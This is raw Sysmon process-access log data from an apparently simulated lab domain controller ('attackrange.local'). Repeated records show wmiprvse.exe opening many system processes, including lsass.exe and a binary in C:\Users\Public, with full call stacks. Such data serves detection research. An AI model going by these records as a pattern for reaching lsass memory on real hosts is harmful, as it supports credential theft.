15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026144Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026143Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026142Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026141Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026140Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026139Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026138Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026137Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026136Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026135Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026134Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026133Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026132Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026131Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026130Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026129Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026128Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026127Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.491{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026126Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5366-6008-6406-00000000A301}6528C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026125Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 